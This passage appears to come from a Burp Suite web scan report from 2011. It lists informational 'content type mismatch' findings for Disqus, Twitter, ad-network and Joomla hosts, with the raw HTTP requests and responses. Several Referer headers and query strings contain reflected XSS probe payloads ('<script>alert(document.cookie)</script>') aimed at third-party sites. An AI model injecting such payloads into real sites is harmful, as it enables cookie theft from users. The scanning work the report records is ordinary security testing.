Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:27:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/html; charset=utf-8

Missing parameters.

32.11. http://7newsboston.disqus.com/thread_share.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/thread_share.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /thread_share.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:18 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 19

Missing parameters.

32.12. http://7newsboston.disqus.com/thread_vote.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/thread_vote.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /thread_vote.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

32.13. http://7newsboston.disqus.com/toggle_thread_closed.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/toggle_thread_closed.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /toggle_thread_closed.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19

Missing parameters.

32.14. http://7newsboston.disqus.com/toggle_thread_killed.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/toggle_thread_killed.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /toggle_thread_killed.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:45 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19

Missing parameters.

32.15. http://7newsboston.disqus.com/update_days_alive.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/update_days_alive.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /update_days_alive.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19

Missing parameters.

32.16. http://7newsboston.disqus.com/update_moderate_all.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/update_moderate_all.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /update_moderate_all.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:52 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/html; charset=utf-8

Missing parameters.

32.17. http://7newsboston.disqus.com/vote.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/vote.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /vote.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:17 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 19

Missing parameters.

32.18. http://a1.twimg.com/profile_images/343677863/twitterProfilePhoto_mini.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a1.twimg.com
Path:	/profile_images/343677863/twitterProfilePhoto_mini.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/343677863/twitterProfilePhoto_mini.jpg HTTP/1.1
Host: a1.twimg.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:20:54 GMT
Expires: Thu, 24 Jan 2019 17:40:02 GMT
Last-Modified: Sun, 02 Aug 2009 03:19:54 GMT
Cache-Control: max-age=252460800
Content-Type: image/jpeg
ETag: "16e2a19feb8b141487141adf5ccc5221"
Accept-Ranges: bytes
Server: AmazonS3
X-Amz-Cf-Id: 75c07f9d1173dce7be51acc5a7dc558818bec8f2170d9340bd112306384c6260edd82db73305add5,021131e991bd41d871c2cf015be6ca42a025b063342d213952143b873d2760be60b3292a242df725
x-amz-id-2: 7665+GotKZiJYkKld8FM4IbmHiPUxXklauvVhWUDZH1vojpgWbkYtsfXTI3l0H3p
x-amz-request-id: 481E901B85FE84C3
X-Cache: Miss from cloudfront
Content-Length: 1682

.PNG
.
...IHDR..............w=.....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD............. pHYs...H...H.F.k>... vpAg.........xL......IDATH.E...\G......{{x..<....D
...[SNIP]...

32.19. http://ad.masjo.com/www/images/9e5dbe547324652614df8323d01ce01e.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.masjo.com
Path:	/www/images/9e5dbe547324652614df8323d01ce01e.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /www/images/9e5dbe547324652614df8323d01ce01e.jpg HTTP/1.1
Host: ad.masjo.com
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=143117481.1295903077.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; __utma=143117481.1825936610.1295903073.1295903073.1295903073.1; __utmc=143117481; __utmb=143117481.1.10.1295903073; OAID=84cb75988ed38bcbe06c44d77408a71e

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:04:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Sun, 16 Jan 2011 12:37:36 GMT
ETag: "238d79-fb45-499f5ee9ac400"
Accept-Ranges: bytes
Content-Length: 64325
Content-Type: image/jpeg

GIF89a............M9i........../U'Q.A........H..@rqq............M.<l.9.....>OOPBy4...........F..e........8..................i.\....h^.........Gf...........-...v{..?s1v.j..5.........H.....n............
...[SNIP]...

32.20. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

32.21. http://ads.tweetmeme.com/impression.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.tweetmeme.com
Path:	/impression.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain plain text.

Request

GET /impression.jpg?id=137&rand=43514911277 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:54 GMT
Content-Type: image/jpeg
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: ded2061
Content-Length: 1

1

32.22. http://api.kickapps.com/rest/getvideometadata/404472/94274 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.kickapps.com
Path:	/rest/getvideometadata/404472/94274

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain;charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /rest/getvideometadata/404472/94274 HTTP/1.1
Host: api.kickapps.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Tue, 25 Jan 2011 02:23:09 GMT
Server: Noelios-Restlet-Engine/1.0..11
Content-Language: *
Content-Type: text/plain;charset=UTF-8
Content-Length: 46

{"status":"-1","error":"media does not exist"}

32.23. http://api.tweetmeme.com/url_info.jsonc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.tweetmeme.com
Path:	/url_info.jsonc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /url_info.jsonc?url=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx22&callback=aptureJsonCallback1 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

32.24. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.cloudscan.us
Path:	/examples/html/sql-injection-xss-cross-site-scripting-dork.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

32.25. http://cdnserve.a-widget.com/service/getWidget2.kickAction previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdnserve.a-widget.com
Path:	/service/getWidget2.kickAction

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain;charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /service/getWidget2.kickAction?revision=14&as=94274&widgetId=160832 HTTP/1.1
Host: cdnserve.a-widget.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Last-Modified: 8 Oct 2010 21:11:48 GMT
Content-Type: text/plain;charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=0
Expires: Tue, 25 Jan 2011 02:23:06 GMT
Date: Tue, 25 Jan 2011 02:23:06 GMT
Connection: close
Content-Length: 3311

{"adBuyOut":true,"cs_rwid":"","cs_wid":"","feedAkHost":"serve.a-feed.com","height":"330","pathToPreview":"94274/photos/WIDGET_160832_ap.jpg","pathToPreview160X160":"94274/photos/WIDGET_160832_ap_160X1
...[SNIP]...

32.26. http://dave.willfork.com/slrnface/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://dave.willfork.com
Path:	/slrnface/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /slrnface/ HTTP/1.1
Host: dave.willfork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.27. http://delb.opt.fimserve.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://delb.opt.fimserve.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

32.28. http://delb.opt.fimserve.com/fimbid/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://delb.opt.fimserve.com
Path:	/fimbid/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

32.29. http://developer.joomla.org/media/system/js/mootools-more.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://developer.joomla.org
Path:	/media/system/js/mootools-more.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

Response

32.30. http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://download.macromedia.com
Path:	/pub/shockwave/cabs/director/sw.cab

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /pub/shockwave/cabs/director/sw.cab HTTP/1.1
Host: download.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.31. http://drn.newsguy.com/newsgrps.txt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://drn.newsguy.com
Path:	/newsgrps.txt

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /newsgrps.txt HTTP/1.1
Host: drn.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:06:09 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Last-Modified: Mon, 24 Jan 2011 11:20:01 GMT
ETag: "109f1c4-264bbf-4d3d6061"
Accept-Ranges: bytes
Content-Length: 2509759
Connection: close
Content-Type: text/plain

Don't see a newsgroup on our list? Just let us know & we'd be happy to add it!

0
0.akita-inu
0.alaskan-malamute
0.alaskan-malamutes
0.siberian-huskys
0.test
0.verizon.adsl
0.verizon.discussion-genera
...[SNIP]...

32.32. http://fastdial.com/misc/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://fastdial.com
Path:	/misc/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /misc/favicon.ico HTTP/1.1
Host: fastdial.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:03:20 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 17 Sep 2007 08:41:57 GMT
ETag: "f50056-1536-43a50c6fb5f40"
Accept-Ranges: bytes
Content-Length: 5430
Cache-Control: max-age=1209600
Expires: Tue, 08 Feb 2011 02:03:20 GMT
Content-Type: text/plain; charset=UTF-8

............ .h...&... .... .........(....... ..... .........................................}N...W.z.X...W...l!..y6..^...R.".............................W.G.V...Y...Y....[...{...P...u..|6..U.z......
...[SNIP]...

32.33. http://hostedusa3.whoson.com/include.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://hostedusa3.whoson.com
Path:	/include.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /include.js HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.34. http://hostedusa3.whoson.com/invite.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://hostedusa3.whoson.com
Path:	/invite.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /invite.js HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.35. http://javadl-esd.sun.com/update/AU/map-2.0.2.4.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://javadl-esd.sun.com
Path:	/update/AU/map-2.0.2.4.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /update/AU/map-2.0.2.4.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: javadl-esd.sun.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Date: Sun, 23 Jan 2011 16:10:49 GMT
Connection: close
Cache-Control: private

File not found.

32.36. http://joomlacode.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://joomlacode.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.1.10.1295919318

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 12 Aug 2008 06:48:54 GMT
ETag: "1358c42-47e-4543daa50c180"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........#...#.............PK..Q...P...Q.................................4@..5@..5@..5@._..Q...P...P...Q...P...Q...1G........,5.Q5@..5@..4?..5@..5@..5@....Q...Q...
...[SNIP]...

32.37. http://joomlacode.org/gf/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://joomlacode.org
Path:	/gf/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

32.38. http://keywords.fmpub.net/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://keywords.fmpub.net
Path:	/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?t=js&s=310&u=http%3A%2F%2Fads.tweetmeme.com%2Fserve.js%3Ftag%3Dhome%26width%3D300%26height%3D600%26rand%3D26297691596 HTTP/1.1
Host: keywords.fmpub.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=600&rand=26297691596
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:20:56 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Server: adserver2.chi.fmpub.net
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32

var ___fm_kw = '';___fm_kw = '';

32.39. http://kickapps.yuku.com/kickapps/service/getWidget.kickAction previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://kickapps.yuku.com
Path:	/kickapps/service/getWidget.kickAction

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain JSON.

Request

Response

32.40. http://l.apture.com/v2/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://l.apture.com
Path:	/v2/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v2/?1=%7B%22pageId%22%3A201236214%2C%22visitId%22%3A34736088960046%2C%22duration%22%3A2778658%2C%22numLinks%22%3A0%2C%22numLinksOpened%22%3A0%2C%22durationPopupsOpened%22%3A0%2C%22referrer%22%3A%22http%3A%2F%2Fburp%2Fshow%2F35%22%2C%22quirks%22%3Anull%2C%22numTmmLinks%22%3A0%2C%22type%22%3A25%2C%22siteId%22%3A197235%7D HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Origin: http://starscene.dailystar.com.lb
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 604800
Content-Length: 2
Date: Mon, 24 Jan 2011 21:58:02 GMT

{}

32.41. http://mako.cc/projects/aub/COPYING previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mako.cc
Path:	/projects/aub/COPYING

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /projects/aub/COPYING HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:25 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "6447d-119-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 281
Connection: close
Content-Type: text/plain

This code is offered as-is. Anyone is welcome to use this program and
to make and distribute improvements, provided that the notice of
